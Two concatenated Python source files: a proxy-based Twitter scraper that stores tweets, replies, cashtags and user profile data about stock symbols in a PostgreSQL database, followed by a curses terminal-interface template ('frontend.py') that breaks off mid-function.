tweet.data_conversation_id = tweetPQ.attr("data-conversation-id") tweet.is_reply_href = tweetPQ('a.js-user-profile-link').attr('href') tweet.is_reply_screen_name = tweet.is_reply_href.replace('/', '') tweet.is_reply_id = tweetPQ('a.js-user-profile-link').attr('data-user-id') if tweet.is_reply_id == tweet.user_id: # reply to self tweet.is_reply_username = tweet.user_name else: tt = re.findall('<span class="username(.+?)</span>', str(tweetPQ('a.js-user-profile-link')), re.S | re.M) try: tweet.is_reply_username = re.findall('<b>(.+?)</b>', tt[0])[0] except IndexError: print('ERROR', tweetPQ('a.js-user-profile-link')) print(tt, tweet.is_reply_id, tweet.permalink) raise LoadingError # print(tweet.is_reply_username) # print(tweet.is_reply_href,tweet.is_reply_screen_name,tweet.is_reply_id,tweet.is_reply_username) else: tweet.is_reply = False # tweet.data_conversation_id = '' tweet.is_reply_href = '' tweet.is_reply_screen_name = '' tweet.is_reply_id = '' tweet.is_reply_username = '' tweet.likes = None tweet.user_tweet_count = None tweet.user_following_count = None tweet.user_followers_count = None tweet.user_created = None tweet.is_verified = None tweet.website = None tweet.user_location = None if settings.ISUSERPROFILE: r = get_user_profile(usernameTweet, page, tweet) if r: tweet = r # tweet.user_created,tweet.user_followers_count,tweet.user_following_count,tweet.user_tweet_count=get_user_profile(tweet.screen_name,ses,pr) # geolocation tweet.location_name = None tweet.location_id = None if settings.ISLOCATION: url = 'https://twitter.com/' + tweet.screen_name + '/status/' + str( tweet.data_conversation_id) + '?conversation_id=' + str(tweet.data_conversation_id) j = get_s(page, url, tweet.screen_name, important=False) if j: tweet_status = PyQuery(j['page'])('a.js-geo-pivot-link') if tweet_status: # print(tweet_status.text(), tweet_status.attr('data-place-id')) tweet.location_name = tweet_status.text() tweet.location_id = tweet_status.attr('data-place-id') if tweet_status.attr('data-place-id') else '' yield tweet return None # Get user profiles function def get_user_profile(usernameTweet, page, tweet): url = 'https://twitter.com/' + usernameTweet j = get_s(page, url, '') # query_string) if j: if j['init_data']: if j['init_data']['profile_user']: # print(json.dumps(j['init_data']['profile_user'], indent=4)) # exit() .120 tweet.likes = j['init_data']['profile_user']['favourites_count'] tweet.user_tweet_count = j['init_data']['profile_user']['statuses_count'] tweet.user_listed_count = j['init_data']['profile_user']['listed_count'] tweet.user_description = j['init_data']['profile_user']['description'] tweet.user_timezone = j['init_data']['profile_user']['time_zone'] tweet.utc_offset = j['init_data']['profile_user']['utc_offset'] tweet.user_following_count = j['init_data']['profile_user']['friends_count'] tweet.user_followers_count = j['init_data']['profile_user']['followers_count'] tweet.user_created = j['init_data']['profile_user']['created_at'] tweet.is_verified = j['init_data']['profile_user']['verified'] tweet.website = j['init_data']['profile_user']['url'] tweet.username = j['init_data']['profile_user']['name'] tweet.utc_offset = j['init_data']['profile_user']['utc_offset'] if j['init_data']['profile_user'].get('location', False): tweet.user_location = j['init_data']['profile_user']['location'] else: tweet.user_location = '' return tweet return None def get_s(page, url, screen_name, important=True): h = {'X-Requested-With': 'XMLHttpRequest', 'x-overlay-request': 'true', 'x-previous-page-name': 'profile'} resp = page.load(url, headers=h, important=important) j = resp if resp: try: j = json.loads(resp) except: print(url, resp) # print('AWAM: JSON popup', str(i), screen_name, url) print('Error limit exceeded ', resp.status_code, resp.text) if important: raise LoadingError else: return None return j def get_symbols(s): s = s.upper() res = re.findall('(\$[A-Z]{1,6}([._][A-Z]{1,2})?)', s, re.M) if res: r = list(map(lambda x: x[0], res)) r = list(set(r)) return r else: return [] # Full scrape function def scra(query, i, proxy, lock, session): def tokenize(s): return tokens_re.findall(s) def preprocess(s, lowercase=False): tokens = tokenize(s) if lowercase: tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens] return tokens q = query[4] fieldnames = ["QueryStartDate", "QueryEndDate", "Query", "DateOfActivity", "UserScreenName", "Keyword", "Location", "Website", "DateJoined", "IsMention", "UserID", "TimeOfActivity", "Hashtags", "Re_tweet", "NumberOfReplies", "NumberOfRe_tweets", "NumberOfFavorites", "Tweet", "tweet_id", "tweet_url", "is_verified", "Urls", "UserFollowersCount", "UserFollowingCount", "UserTweetsCount", "LikesCount", "CashtagSymbols", "user_location", "permno"] count = 0 # for t in chain(get_retweets(query, proxy=proxy), # get_retweets(query, proxy=proxy, nativeretweets=True)): ttm = time.time() tweet_list = [] page = Page(proxy) # Loop trough search results... for t in get_new_search(page, query): # pprint(t) # d = str(datetime.fromtimestamp(t.unixtime)) # t1 = datetime.strptime(query[2], '%Y-%m-%d %H:%M:%S') # t2 = datetime.strptime(query[3], '%Y-%m-%d %H:%M:%S') # if int(t1.timestamp()) > int(t.unixtime): # continue # if int(t.unixtime) > int(t2.timestamp()): # continue data = {} data['permno'] = q data['user_location'] = t.user_location data['LikesCount'] = t.likes data['Website'] = t.website data['QueryStartDate'] = query[2] data['QueryEndDate'] = query[3] data['Query'] = query[1] data['Keyword'] = query[1] data['TimeOfActivity'] = time.strftime('%H:%M:%S', time.localtime(t.unixtime)) data['DateOfActivity'] = time.strftime('%d/%m/%Y', time.localtime(t.unixtime)) data['tweet_id'] = t.id data['tweet_url'] = t.permalink data['UserID'] = t.user_id data['UserScreenName'] = t.screen_name data['UserName'] = t.user_name data['TimeZone'] = t.time_zone data['UserTweetsCount'] = t.user_tweet_count data['UserFollowersCount'] = t.user_followers_count data['UserFollowingCount'] = t.user_following_count data['NumberOfFavorites'] = t.favorites_count data['NumberOfRe_tweets'] = t.retweets_count data['NumberOfReplies'] = t.replyes_count data['Re_tweet'] = t.is_retweet data['is_verified'] = t.is_verified # data['isProtected'] = t.is_protected data['isReply'] = t.is_reply data['ReplyTweetID'] = t.data_conversation_id data['ReplyUserId'] = t.is_reply_id # data['ReplyScreenName'] = t.is_reply_screen_name # data['Lang'] = t.lang data['Hashtags'] = ' '.join(t.hashtags) data['Urls'] = ', '.join(t.urls) data['CashtagSymbols'] = '\n'.join(t.symbols) # data['Mentions_id'] = '\n'.join(t.mentions_id) data['IsMention'] = ' '.join(t.mentions_name) data['Location'] = t.location_name # data['Location ID'] = t.location_id data['DateJoined'] = dateparser.parse(t.user_created) if t.user_created else None data['Tweet'] = t.text if t.utc_offset: if t.utc_offset / 3600 >= 0: data['TimeZoneUTC'] = 'UTC+' + str(int(t.utc_offset / 3600)) else: data['TimeZoneUTC'] = 'UTC' + str(int(t.utc_offset / 3600)) else: data['TimeZoneUTC'] = None tokens = preprocess(t.text) cashtags = [term for term in tokens if term.startswith('$') and len(term) > 1] hashtags = [term for term in tokens if term.startswith('#') and len(term) > 1] mentions = [term for term in tokens if term.startswith('@') and len(term) > 1] urls = [term for term in tokens if term.startswith('http') and len(term) > 4] tweet_list.append(data) # pprint(data) print(query, count, t.date) # print(data) if settings.ISUSERPROFILE: pass # dd = re.findall('\w+ (\w+) (\d+) \d+:\d+:\d+ \+\d+ (\d+)', data['DateJoined']) # try: # date_joined = datetime.strptime(' '.join(dd[0]), '%b %d %Y') # except IndexError: # print(data['DateJoined'], dd) # exit() else: date_joined = None t.user_listed_count = None t.username = t.user_name t.user_timezone = None t.user_description = None data['Website'] = None data['is_verified'] = None if session.query(Tweet).filter_by(tweet_id=data['tweet_id']).first(): continue user = session.query(User).filter_by(user_id=data['UserID']).first() if not user: user_count = UserCount(follower=data['UserFollowersCount'], following=data['UserFollowingCount'], tweets=data['UserTweetsCount'], likes=data['NumberOfFavorites'], lists=t.user_listed_count) session.add(user_count) user = User(user_id=data['UserID'], twitter_handle=data['UserScreenName'][:120], user_name=data['UserName'][:120], location=data['user_location'][:255] if data['user_location'] else None, date_joined=data['DateJoined'], timezone=data['TimeZoneUTC'], website=data['Website'][:255] if data['Website'] else None, user_intro=t.user_description[:255] if t.user_description else None, verified=data['is_verified']) user.counts.append(user_count) session.add(user) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK USER') session.rollback() except Exception as e: print(e) raise twit = session.query(Tweet).filter_by(tweet_id=data['tweet_id']).first() if not twit: twit = Tweet(tweet_id=data['tweet_id'], date=datetime.strptime(data['DateOfActivity'], '%d/%m/%Y'), time=data['TimeOfActivity'], timezone=data['TimeZone'][:10] if t.user_timezone else None, retweet_status=data['Re_tweet'], text=data['Tweet'], location=data['Location'][:255] if data['Location'] else None, permalink=data['tweet_url'] if data['tweet_url'] else None, emoticon=','.join(t.emoji) if t.emoji else None) tweet_count = TweetCount(reply=data['NumberOfReplies'], favorite=data['NumberOfFavorites'], retweet=t.retweets_count) if t.is_reply and settings.ISREPLY: url = 'https://twitter.com/' + t.screen_name + '/status/' + str( data['tweet_id']) + '?conversation_id=' + str(t.data_conversation_id) r1 = page.load(url) for tw in PyQuery(r1)('li.js-stream-item'): r_date_time = PyQuery(tw)('span.js-short-timestamp').attr('data-time') r_text = PyQuery(tw)('p.js-tweet-text').text() data_user_id = PyQuery(tw)('div.js-stream-tweet').attr('data-user-id') reply_item_id = PyQuery(tw).attr('data-item-id') e = PyQuery(tw)('img.Emoji') r_emoji = [] for em in e: r_emoji.append(str(PyQuery(em).attr('aria-label').replace('Emoji: ', ''))) if re.search('show_more_button', r1, re.M): # PyQuery(r1)('li.ThreadedConversation-moreReplies').attr('data-expansion-url') u = 'https://twitter.com/i/' + t.screen_name + '/conversation/' + str( t.data_conversation_id) + '?include_available_features=1&include_entities=1&max_position=DAACDwABCgAAAA0NGVYFElfQAQ0ZUm161tABDRlmNLsXUAENGVN_UddwAA0ZYae2FgAADRlT_t6XcAMNGVX62haQBg0ZUn9bF-ABDRlYig7W4AANGVM58xfgAA0ZUxcJ15ABDRlUJzMW0AENGW38gpbQAAgAAwAAAAECAAQAAAA&reset_error_state=false' print('This is an error on purpuse. The reply_id is', data['tweet_id']) if not session.query(Reply).filter_by(reply_id=data['tweet_id']).first(): parent_twit = session.query(Tweet).filter_by(tweet_id=t.data_conversation_id).first() TimeOfActivity = time.strftime('%H:%M:%S', time.localtime(int(r_date_time))) DateOfActivity = time.strftime('%d/%m/%Y', time.localtime(int(r_date_time))) reply = Reply(reply_id=reply_item_id, reply_user_id=data_user_id, date=datetime.strptime(DateOfActivity, '%d/%m/%Y'), time=TimeOfActivity, timezone=None, text=r_text, emoticon=','.join(r_emoji) if r_emoji else None) session.add(reply) if parent_twit: parent_twit.replies.append(reply) else: twit.replies.append(reply) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK REPLY') session.rollback() except Exception as e: print(e) raise if not session.query(TweetHashtags).filter_by(tweet_id=data['tweet_id']).first(): for hash_s in hashtags: tweet_hashtag = TweetHashtags(hashtags=hash_s[:45]) twit.hash_s.append(tweet_hashtag) session.add(tweet_hashtag) if not session.query(TweetUrl).filter_by(tweet_id=data['tweet_id']).first(): for url_s in urls: tweet_url = TweetUrl(url=url_s[:255]) twit.url_s.append(tweet_url) session.add(tweet_url) if not session.query(TweetCashtags).filter_by(tweet_id=data['tweet_id']).first(): for cash_s in cashtags: tweet_cashtag = TweetCashtags(cashtags=cash_s[:45]) twit.cash_s.append(tweet_cashtag) session.add(tweet_cashtag) if not session.query(TweetMentions).filter_by(tweet_id=data['tweet_id']).first(): for ment_s in t.ment_s: tweet_mentions = TweetMentions(mentions=ment_s[0][:45], user_id=ment_s[1]) twit.ment_s.append(tweet_mentions) session.add(tweet_mentions) user.tweets.append(twit) twit.counts.append(tweet_count) session.add(tweet_count) session.add(twit) try: session.commit() except sqlalchemy.exc.IntegrityError as err: if re.match("(.*)Duplicate entry(.*)for key 'PRIMARY'(.*)", err.args[0]): print('ROLLBACK USER') session.rollback() except Exception as e: print(e) raise count += 1 lock.acquire() if count > 0: with open('report.csv', 'a') as f: # Add reports to this file data = {} fdnames = ['time', 'query_name', 'number', ] writer = csv.DictWriter(f, lineterminator='\n', fieldnames=fdnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) data['time'] = time.strftime('%Y-%m-%d %H:%M:%S') data['query_name'] = query[1] data['number'] = count writer.writerow(data) lock.release() return count else: with open('error.csv', 'a') as f: # Add errors to this file data = {} fdnames = ['time', 'query_name', 'number', ] writer = csv.DictWriter(f, lineterminator='\n', fieldnames=fdnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) data['time'] = time.strftime('%Y-%m-%d %H:%M:%S') data['query_name'] = query[1] data['number'] = count writer.writerow(data) lock.release() return False def compare_90(string1, string2): if len(string1) == 0 and len(string2) == 0: return True if len(string1) >= len(string2): s1 = string1 s2 = string2 else: s1 = string2 s2 = string1 if len(s2) == 0 and len(s2) != len(s1): return False if float(len(s1) / len(s2)) > float(100 / COEF): return False mismatch_count = 0.0 treshold = float(len(s1) * (1 - (COEF / 100))) for i in range(len(s2)): if s1[i] != s2[i]: mismatch_count += 1.0 if mismatch_count > treshold: return False return True def scrape_query(user_queue, proxy, lock, pg_dsn): db_engine = create_engine(pg_dsn, pool_size=1) add_engine_pidguard(db_engine) DstSession = sessionmaker(bind=db_engine, autoflush=False) session = DstSession() active = True while not user_queue.empty(): query, i = user_queue.get() print('START', i, proxy, query) # TODO filter:nativeretweets try: res = scra(query, i, proxy, lock, session=session) except LoadingError: print('LoadingError except') return False if not res: print(' SCRAP_USER Error in', query, i) with open('error_list.txt', 'a') as f: f.write(query[0] + '\n') else: print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), ' ENDED', i, proxy, query, res) return True def get_up(fname, proxy): n = 0 fieldnames = ["QueryStartDate", "QueryEndDate", "Query", "DateOfActivity", "UserScreenName", "Keyword", "Location", "Website", "DateJoined", "IsMention", "UserID", "TimeOfActivity", "Hashtags", "Re_tweet", "NumberOfReplies", "NumberOfRe_tweets", "NumberOfFavorites", "Tweet", "tweet_id", "tweet_url", "is_verified", "Urls", "UserFollowersCount", "UserFollowingCount", "UserTweetsCount", "LikesCount", "CashtagSymbols", "user_location", "permno"] # print('Processing file {} ...'.format(fname)) with open(fname, 'r', encoding='utf-8') as csvfile: reader = csv.DictReader(csvfile) recordlist = [] count = 0 for row in reader: recordlist.append(row) count += 1 # print(' Read {} rows'.format(count)) page = Page(proxy) new_list = [] i = 0 user_profiles = {} tt = time.time() for row in recordlist: tweet = Tweet() try: if user_profiles.get(row['UserScreenName'], None): r = Tweet() rt = user_profiles[row['UserScreenName']] r.user_location = rt['user_location'] r.user_tweet_count = rt['UserTweetsCount'] r.user_following_count = rt['UserFollowingCount'] r.user_followers_count = rt['UserFollowersCount'] r.likes = rt['LikesCount'] r.user_created = rt['DateJoined'] r.website = rt['Website'] r.is_verified = rt['is_verified'] else: try: r = get_user_profile(row['UserScreenName'], page, tweet) except LoadingError: print('Skip user', row['UserScreenName']) r = None if r: tweet = r # print(tweet.likes,tweet.user_tweet_count,tweet.user_following_count,tweet.user_followers_count, # tweet.user_created,tweet.is_verified,tweet.website,tweet.user_location) rt = {} rt['user_location'] = row['user_location'] = tweet.user_location rt['UserTweetsCount'] = row['UserTweetsCount'] = tweet.user_tweet_count rt['UserFollowingCount'] = row['UserFollowingCount'] = tweet.user_following_count rt['UserFollowersCount'] = row['UserFollowersCount'] = tweet.user_followers_count rt['LikesCount'] = row['LikesCount'] = tweet.likes rt['DateJoined'] = row['DateJoined'] = tweet.user_created rt['Website'] = row['Website'] = tweet.website rt['is_verified'] = row['is_verified'] = tweet.is_verified user_profiles[row['UserScreenName']] = rt new_list.append(row) i += 1 k = 50 if i % k == 0: print(' {} Loaded {} user profiles '.format(fname, i)) tt = time.time() except KeyError as e: print('File {} has the wrong content,skipped'.format(fname)) break else: with open(fname, 'w', encoding='utf-8') as csvfile: writer = csv.DictWriter(csvfile, extrasaction='ignore', restval='', lineterminator='\n', fieldnames=fieldnames, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL) writer.writeheader() writer.writerows(new_list) # print('Write {} rows'.format(len(new_list))) n = len(new_list) return n def get_pup(user_queue, proxy): while not user_queue.empty(): fname, i = user_queue.get() print('START', i, proxy, fname) res = get_up(fname, proxy) print('ENDED', i, proxy, fname, res) return True def add_engine_pidguard(engine): """Add multiprocessing guards. Forces a connection to be reconnected if it is detected as having been shared to a sub-process. """ @event.listens_for(engine, "connect") def connect(dbapi_connection, connection_record): connection_record.info['pid'] = os.getpid() # Returns the current process id @event.listens_for(engine, "checkout") def checkout(dbapi_connection, connection_record, connection_proxy): pid = os.getpid() if connection_record.info['pid'] != pid: # substitute log.debug() or similar here as desired warnings.warn( "Parent process %(orig)s forked (%(newproc)s) with an open " "database connection, " "which is being discarded and recreated." % {"newproc": pid, "orig": connection_record.info['pid']}) connection_record.connection = connection_proxy.connection = None raise exc.DisconnectionError( "Connection record belongs to pid %s, " "attempting to check out in pid %s" % (connection_record.info['pid'], pid) ) # start of main program if __name__ == '__main__': # making dict with postgres login data pg_config = {'username': settings.PG_USER, 'password': settings.PG_PASSWORD, 'database': settings.PG_DBNAME, 'host': settings.DB_HOST} # postgres connection string pg_dsn = "postgresql+psycopg2://{username}:{password}@{host}:5432/{database}".format(**pg_config) # Construct a base class for declarative class definitions. Base = declarative_base() db_engine = create_engine(pg_dsn) add_engine_pidguard(db_engine) # container object that keeps together many different features of a database (or multiple databases) being described. pg_meta = MetaData(bind=db_engine, schema="fintweet") # Reflect destination tables print('I am here !') # class User(Base): # __table__ = Table('user', pg_meta, autoload=True) # tweets = relationship('Tweet') # counts = relationship('UserCount') # # # class UserCount(Base): # __table__ = Table('user_count', pg_meta, autoload=True) # # # class TweetCount(Base): # __table__ = Table('tweet_count', pg_meta, autoload=True) # # # class TweetMentions(Base): # __table__ = Table('tweet_mentions', pg_meta, autoload=True) # # # class TweetCashtags(Base): # __table__ = Table('tweet_cashtags', pg_meta, autoload=True) # # # class TweetHashtags(Base): # __table__ = Table('tweet_hashtags', pg_meta, autoload=True) # # # class TweetUrl(Base): # __table__ = Table('tweet_url', pg_meta, autoload=True) # # # class Tweet(Base): # __table__ = Table('tweet', pg_meta, autoload=True) # counts = relationship('TweetCount') # ment_s = relationship('TweetMentions') # cash_s = relationship('TweetCashtags') # hash_s = relationship('TweetHashtags') # url_s = relationship('TweetUrl') # class Reply(Base): # __tablename__ = 'reply' # reply_id = Column(BIGINT, primary_key=True) # tweet_id = Column(BIGINT, ForeignKey('tweet.tweet_id')) # reply_user_id = Column(BIGINT) # date = Column(DATE) # time = Column(TIME(6)) # timezone = Column(VARCHAR(10)) # text = Column(TEXT) # emoticon = Column(TEXT) # config = load_config() DstSession = sessionmaker(bind=db_engine, autoflush=False) dstssn = DstSession() if True: # settings.TWEETS: try: command = sys.argv[1] print(command) except IndexError: command = '' if command == 'location': ISLOCATION = True else: ISLOCATION = False user_queue = ThreadQueue() # load excel file for input fname = 'word_list.xlsx' wb = load_workbook(fname) ws = wb.active ii = i = 2 while True: if not ws.cell(row=i, column=1).value: break t1 = str(ws.cell(row=i, column=4).value).lower().strip(' ') t2 = str(ws.cell(row=i, column=5).value).lower().strip(' ') t1 = re.sub(' 00:00:00', '', t1) t2 = re.sub(' 00:00:00', '', t2) permno = str(ws.cell(row=i, column=1).value).lower().strip(' ') query = str(ws.cell(row=i, column=2).value).lower().strip(' '), \ str(ws.cell(row=i, column=3).value).lower().strip(' '), \ t1, t2, permno print(query) user_queue.put((query, i)) i += 1 pool = ThreadPool(len(settings.PROXY_LIST)) lock = Lock() pool.map(lambda x: (scrape_query(user_queue, x, lock, pg_dsn)), settings.PROXY_LIST) else: path = '.' csv_files = [f for f in os.listdir(path) if f.endswith('.csv')] print('Collecting user data from {} files'.format(len(csv_files))) # pool = ThreadPool(len(settings.PROXY_LIST)) # user_queue = ThreadQueue() user_queue = Queue() i = 0 for fname in csv_files: i += 1 user_queue.put((fname, i)) # pool.map(lambda x: (get_pup(user_queue, x)), settings.PROXY_LIST) pp = [] for s in settings.PROXY_LIST: p = Process(target=get_pup, args=(user_queue, s)) p.start() pp.append(p) # for p in pp: p.join()
frontend.py
#!/usr/bin/env python """ Another AlphaGriffin Project. """ __author__ = "Eric Petersen @Ruckusist" __copyright__ = "Copyright 2022, The Alpha Griffin Project" __credits__ = ["Eric Petersen", "Shawn Wilson", "@alphagriffin"] __license__ = "***" __version__ = "0.0.6" __maintainer__ = "Eric Petersen" __email__ = "ruckusist@alphagriffin.com" __status__ = "Prototype" import os, sys, time, threading import curses import curses.panel # except ImportError: print("this doesnt work in windows"); exit(1) # new color support reqires this. it should just be there... like print. from itertools import cycle from timeit import default_timer as timer from collections import namedtuple class Cursing: def __init__(self): print("[i] Starting Cursing Frontend.") self.curses = curses # curses.filter() self.screen = curses.initscr() self.palette = [] curses.start_color() self.setup_color() curses.noecho() curses.cbreak() curses.curs_set(0) # 0: invisible, 1: visible, 2: bright self.screen.keypad(1) self.screen.nodelay(1) self.screen_h, self.screen_w = self.screen.getmaxyx() self.screen_mode = True def setup_color(self): """Load a custom theme.""" curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) self.color_rw = curses.color_pair(1) curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK) self.color_cb = curses.color_pair(2) curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK) self.color_gb = curses.color_pair(3) curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_RED) self.chess_black = curses.color_pair(4) curses.init_pair(5, curses.COLOR_RED, curses.COLOR_WHITE) self.chess_white = curses.color_pair(5) self.color_bold = curses.A_BOLD self.color_blink = curses.A_BLINK self.color_error = self.color_bold | self.color_blink | self.color_rw # Palette of all available colors... == 8 wtf try: for i in range(0, curses.COLORS): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) except: print("failing to setup color!") for i in range(0, 7): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) pass finally: # print(f"len(curses.COLORS) = {len(self.palette)}") # time.sleep(2) pass def get_input(self): """Pass curses control capture to another class.""" x = 0 # self.footer[0].addstr(1, 1, "Mode: KeyStroke") # self.screen.nodelay(True) if self.screen_mode: x = self.screen.getch() try: if int(x) > 0: self.keystroke(x) except: pass else: self.screen.keypad(0) curses.echo() self.redraw_window(self.footer) x = self.footer[0].getstr(1, 1).decode('UTF-8') self.screen.keypad(1) curses.noecho() self.screen_mode = True self.redraw_window(self.footer) return x def refresh(self): """This should check for a screen resize.""" # TODO: add screensize checker! # # curses.resizeterm(y, x) self.screen.refresh() curses.panel.update_panels() def end_safely(self): """Return control to the shell.""" curses.nocbreak() self.screen.keypad(0) curses.echo() curses.endwin() print("[*] Ended Safely.") def test(self): self.screen.addstr(0, 0, '[%] this is working.1') self.screen.refresh() self.screen.addstr(1, 0, '[%] this is working.2') self.screen.refresh() time.sleep(5) def make_panel(self, dims, label, scroll=False, box=True, banner=True): """Panel factory.""" panel_type = namedtuple('Panel', 'win panel label dims') win = curses.newwin(dims[0], dims[1], dims[2], dims[3]) win.scrollok(scroll) _panel = curses.panel.new_panel(win) panel = panel_type(win, _panel, label, dims) self.redraw_window(panel, box, banner) return panel def redraw_window(self, panel, box=True, banner=True): """Basic refresh to screen.""" panel.win.erase() if box: panel.win.box() if banner: panel.win.addstr(0, 1, str("| {} |".format(panel.label))) def __call__(self, *args, **kwds) -> None: self.test() self.end_safely() pass class Frontend_TEST(Cursing): def panel_test(self): """Sanity Checks.""" panel_1 = self.make_panel([10, 13, 5, 5], "Panel 1") panel_2 = self.make_panel([10, 13, 8, 8], "Panel 2") curses.panel.update_panels() self.screen.refresh() time.sleep(1) panel_1.panel.top() curses.panel.update_panels() self.screen.refresh() time.sleep(1) for i in range(15): panel_2.panel.move(8, 8 + i) curses.panel.update_panels() self.screen.refresh() time.sleep(0.1) time.sleep(2) def __call__(self) -> None: self.panel_test() self.end_safely() pass class Frontend(Cursing): def recalc_winsizes(self): h = self.screen_h w = self.screen_w # HEADER self.header_dims = [3, w, 0, 0] # WINLEFT self.h_split = int(w / 6) - 1 self.winleft_dims = [h-3-4-3, self.h_split, 3, 0] # WINRIGHT self.v_split = int((h-3-4-3)/6) self.winright_lower_dims = [self.v_split, w - self.h_split-1, h-7-self.v_split, self.h_split + 1] #WINRIGHT AGAIN self.winright_upper_dims = [(h-3-4-3)-self.v_split, w - self.h_split-1, 3, self.h_split + 1] # FOOTER self.footer_dims = [3, w, h-3, 0] # DEBUG self.debug_dims = [4, w, h-7, 0] def splash_screen(self): splash = self.make_panel( [self.screen_h, self.screen_w, 0, 0], "splash", box=False, banner=False ) curses.panel.update_panels() self.screen.refresh() cycled = cycle([x for x in range(len(self.palette))]) for x in range(self.screen_h): if x == int(self.screen_h/2): splash.win.addstr(x, int(self.screen_w/2)-7, " Ruckusist.com") splash.win.refresh() time.sleep(.95) else: matrix = ["&", "^", "&", "$", "R", "\\", "|", "/", "-"] cycled_matrix = cycle([x for x in matrix]) for y in range(self.screen_w): if x == self.screen_h-1 and y == self.screen_w-1: break # hacks. splash.win.addstr(x, y, next(cycled_matrix), self.palette[next(cycled)] ) splash.win.refresh() time.sleep(0.0001) time.sleep(2) self.screen.erase() def main_screen(self, header='Deskapp'): """This is attempting a new main panel configuration""" self.recalc_winsizes() self.header = self.make_panel(self.header_dims, header) self.winleft = self.make_panel(self.winleft_dims, "Menu") self.winrightlower = self.make_panel(self.winright_upper_dims, "Panel 3") self.winrightupper = self.make_panel(self.winright_lower_dims, "Messages") self.footer = self.make_panel(self.footer_dims, "Input") self.debug = self.make_panel(self.debug_dims, "Meta") curses.panel.update_panels() self.screen.refresh() def __call__(self) -> None: self.splash_screen() self.main_screen() time.sleep(10) self.end_safely() class Window(object): """The Alphagriffin Curses frontend template.""" def __init__(self, stdscr=None): """Setup basic curses interface.""" if stdscr is None: stdscr = curses.initscr() self.curses = curses self.screen = stdscr self.palette = [] curses.start_color() # curses.use_default_colors() self.setup_color() curses.noecho() curses.cbreak() curses.curs_set(0) # 0: invisible, 1: visible, 2: bright self.screen.keypad(1) self.screen.nodelay(1) self.screen_h, self.screen_w = self.screen.getmaxyx() self.screen_mode = True def get_input(self): """Pass curses control capture to another class.""" x = 0 # self.footer[0].addstr(1, 1, "Mode: KeyStroke") # self.screen.nodelay(True) if self.screen_mode: x = self.screen.getch() try: if int(x) > 0: self.keystroke(x) except: pass else: self.screen.keypad(0) curses.echo() self.redraw_window(self.footer) x = self.footer[0].getstr(1, 1).decode('UTF-8') self.screen.keypad(1) curses.noecho() self.screen_mode = True self.redraw_window(self.footer) return x def setup_color(self): """Load a custom theme.""" curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) self.color_rw = curses.color_pair(1) curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK) self.color_cb = curses.color_pair(2) curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK) self.color_gb = curses.color_pair(3) curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_RED) self.chess_black = curses.color_pair(4) curses.init_pair(5, curses.COLOR_RED, curses.COLOR_WHITE) self.chess_white = curses.color_pair(5) self.color_bold = curses.A_BOLD self.color_blink = curses.A_BLINK self.color_error = self.color_bold | self.color_blink | self.color_rw # Palette of all available colors... == 8 wtf try: for i in range(0, curses.COLORS): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) except: print("failing to setup color!") for i in range(0, 7): if i == 0: curses.init_pair(i+1, i, curses.COLOR_WHITE) else: curses.init_pair(i+1, i, curses.COLOR_BLACK) self.palette.append(curses.color_pair(i)) pass finally: # print(f"len(curses.COLORS) = {len(self.palette)}") # time.sleep(2) pass def refresh(self): """This should check for a screen resize.""" # TODO: add screensize checker! # # curses.resizeterm(y, x) self.screen.refresh() curses.panel.update_panels() def end_safely(self): """Return control to the shell.""" curses.nocbreak() self.screen.keypad(0) curses.echo() curses.endwin() def main_screen(self, msg="RuckusTUI"): """Standard screen template.""" h = self.screen_h w = self.screen_w header_dims = [3, w, 0, 0] split = int(w / 6) - 1 winleft_dims = [h-3-4-3, split, 3, 0] self.winright_dims = [h-3-4-3, w - split-1, 3, split + 1] footer_dims = [3, w, h-3, 0] debug_dims = [4, w, h-7, 0] self.header = self.make_panel(header_dims, "header", box=True) self.winleft = self.make_panel(winleft_dims, "options", True, box=True) self.winright = self.make_panel(self.winright_dims, "screen", True, box=True) self.debug = self.make_panel(debug_dims, "debugs", True, box=True) self.footer = self.make_panel(footer_dims, "interface", True, box=True) self.keystroke = lambda x: self.footer[0].addstr(1, w-9, "<K: {}>".format(x)) curses.panel.update_panels() self.screen.addstr(h-1,w-9,"<{},{}>".format(h, w)) self.screen.addstr(h-1,w-19,"<FPS: 30>".format(h, w)) self.fps = lambda x: self.screen.addstr(h-1,w-19,"<FPS: {}>".format(x)) self.header[0].addstr(1, 1, msg, self.color_gb) self.screen.refresh() def dual_main_screen(self, msg='Message Center'): h = self.screen_h w = self.screen_w h_split = int(w / 6) - 1 v_split = int((h-3-4-3)/6) winright_upper_dims = [v_split, w - h_split-1, h-7-v_split, h_split + 1] self.winright = self.make_panel(winright_upper_dims, "Panel 3") winright_lower_dims = [(h-3-4-3)-v_split, w - h_split-1, 3, h_split + 1] self.winlower = self.make_panel(winright_lower_dims, "Panel 4") def make_panel(self, dims, label, scroll=False, box=True, banner=True): """Panel factory.""" options = {'dims': dims} win = curses.newwin(dims[0], dims[1], dims[2], dims[3]) win.scrollok(scroll) panel = curses.panel.new_panel(win) self.redraw_window([win, panel, label], box, banner) return win, panel, label, options def redraw_window(self, win, box=True, banner=True): """Basic 